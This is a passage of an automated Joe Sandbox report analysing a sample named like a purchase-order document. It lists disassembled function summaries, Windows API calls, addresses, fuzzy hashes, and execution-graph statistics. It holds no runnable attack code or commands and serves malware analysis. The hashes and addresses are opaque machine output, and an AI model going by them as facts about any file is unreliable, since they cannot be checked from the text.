                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: wcschr$memcpywcslen
                                                                                • String ID: "
                                                                                • API String ID: 1983396471-123907689
                                                                                • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                APIs
                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                • _memicmp.MSVCRT ref: 0040C00D
                                                                                • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FilePointer_memicmpmemcpy
                                                                                • String ID: URL
                                                                                • API String ID: 2108176848-3574463123
                                                                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                APIs
                                                                                • _snwprintf.MSVCRT ref: 0040A398
                                                                                • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintfmemcpy
                                                                                • String ID: %2.2X
                                                                                • API String ID: 2789212964-323797159
                                                                                • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _snwprintf
                                                                                • String ID: %%-%d.%ds
                                                                                • API String ID: 3988819677-2008345750
                                                                                • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                APIs
                                                                                • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                • memset.MSVCRT ref: 00401917
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: PlacementWindowmemset
                                                                                • String ID: WinPos
                                                                                • API String ID: 4036792311-2823255486
                                                                                • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                APIs
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                • wcscat.MSVCRT ref: 0040DCFF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                • String ID: _lng.ini
                                                                                • API String ID: 383090722-1948609170
                                                                                • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                • API String ID: 2773794195-880857682
                                                                                • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID: MZ@
                                                                                • API String ID: 1378638983-2978689999
                                                                                • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                • memset.MSVCRT ref: 0042BAAE
                                                                                • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID:
                                                                                • API String ID: 438689982-0
                                                                                • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                APIs
                                                                                  • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$memset
                                                                                • String ID:
                                                                                • API String ID: 1860491036-0
                                                                                • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                • free.MSVCRT ref: 0040A908
                                                                                • free.MSVCRT ref: 0040A92B
                                                                                • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                • String ID:
                                                                                • API String ID: 726966127-0
                                                                                • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 0040B1DE
                                                                                • free.MSVCRT ref: 0040B201
                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                • free.MSVCRT ref: 0040B224
                                                                                • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free$memcpy$mallocwcslen
                                                                                • String ID:
                                                                                • API String ID: 726966127-0
                                                                                • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                APIs
                                                                                • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp$memcpy
                                                                                • String ID:
                                                                                • API String ID: 231171946-0
                                                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                APIs
                                                                                • strlen.MSVCRT ref: 0040B0D8
                                                                                • free.MSVCRT ref: 0040B0FB
                                                                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                • free.MSVCRT ref: 0040B12C
                                                                                • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: free$memcpy$mallocstrlen
                                                                                • String ID:
                                                                                • API String ID: 3669619086-0
                                                                                • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                • malloc.MSVCRT ref: 00417407
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                • free.MSVCRT ref: 00417425
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                • String ID:
                                                                                • API String ID: 2605342592-0
                                                                                • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$wcscat$wcscpy
                                                                                • String ID:
                                                                                • API String ID: 1961120804-0
                                                                                • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                Execution Graph

                                                                                Execution Coverage:2.4%
                                                                                Dynamic/Decrypted Code Coverage:19.9%
                                                                                Signature Coverage:0.5%
                                                                                Total number of Nodes:869
                                                                                Total number of Limit Nodes:21
                                                                                execution_graph 34101 40fc40 70 API calls 34274 403640 21 API calls 34102 427fa4 42 API calls 34275 412e43 _endthreadex 34276 425115 76 API calls __fprintf_l 34277 43fe40 133 API calls 34105 425115 83 API calls __fprintf_l 34106 401445 memcpy memcpy DialogBoxParamA 34107 440c40 34 API calls 34109 411853 RtlInitializeCriticalSection memset 34110 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34283 40a256 13 API calls 34285 432e5b 17 API calls 34287 43fa5a 20 API calls 34112 401060 41 API calls 34290 427260 CloseHandle memset memset 33167 410c68 FindResourceA 33168 410c81 SizeofResource 33167->33168 33171 410cae 33167->33171 33169 410c92 LoadResource 33168->33169 33168->33171 33170 410ca0 LockResource 33169->33170 33169->33171 33170->33171 34292 405e69 14 API calls 34117 433068 15 API calls __fprintf_l 34294 414a6d 18 API calls 34295 43fe6f 134 API calls 34119 424c6d 15 API calls __fprintf_l 34296 426741 19 API calls 34121 440c70 17 API calls 34122 443c71 44 API calls 34125 427c79 24 API calls 34299 416e7e memset __fprintf_l 34129 42800b 47 API calls 34130 425115 85 API calls __fprintf_l 34302 41960c 61 API calls 34131 43f40c 122 API calls __fprintf_l 34134 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34135 43f81a 20 API calls 34137 414c20 memset memset 34138 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34306 414625 18 API calls 34307 404225 modf 34308 403a26 strlen WriteFile 34310 40422a 12 API calls 34314 427632 memset memset memcpy 34315 40ca30 59 API calls 34316 404235 26 API calls 34139 42ec34 61 API calls __fprintf_l 34140 425115 76 API calls __fprintf_l 34317 425115 77 API calls __fprintf_l 34319 44223a 38 API calls 34146 43183c 112 API calls 34320 44b2c5 _onexit __dllonexit 34325 42a6d2 memcpy __allrem 34148 405cda 65 API calls 34333 43fedc 138 API calls 34334 4116e1 16 API calls __fprintf_l 34151 4244e6 19 API calls 34153 42e8e8 127 API calls __fprintf_l 34154 4118ee RtlLeaveCriticalSection 34339 43f6ec 22 API calls 34156 425115 119 API calls __fprintf_l 33157 410cf3 EnumResourceNamesA 34342 4492f0 memcpy memcpy 34344 43fafa 18 API calls 34346 4342f9 15 API calls __fprintf_l 34157 4144fd 19 API calls 34348 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34349 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34352 443a84 _mbscpy 34354 43f681 17 API calls 34160 404487 22 API calls 34356 415e8c 16 API calls __fprintf_l 34164 411893 RtlDeleteCriticalSection __fprintf_l 34165 41a492 42 API calls 34360 403e96 34 API calls 34361 410e98 memset SHGetPathFromIDList SendMessageA 34167 426741 109 API calls __fprintf_l 34168 4344a2 18 API calls 34169 4094a2 10 API calls 34364 4116a6 15 API calls __fprintf_l 34365 43f6a4 17 API calls 34366 440aa3 20 API calls 34368 427430 45 API calls 34172 4090b0 7 API calls 34173 4148b0 15 API calls 34175 4118b4 RtlEnterCriticalSection 34176 4014b7 CreateWindowExA 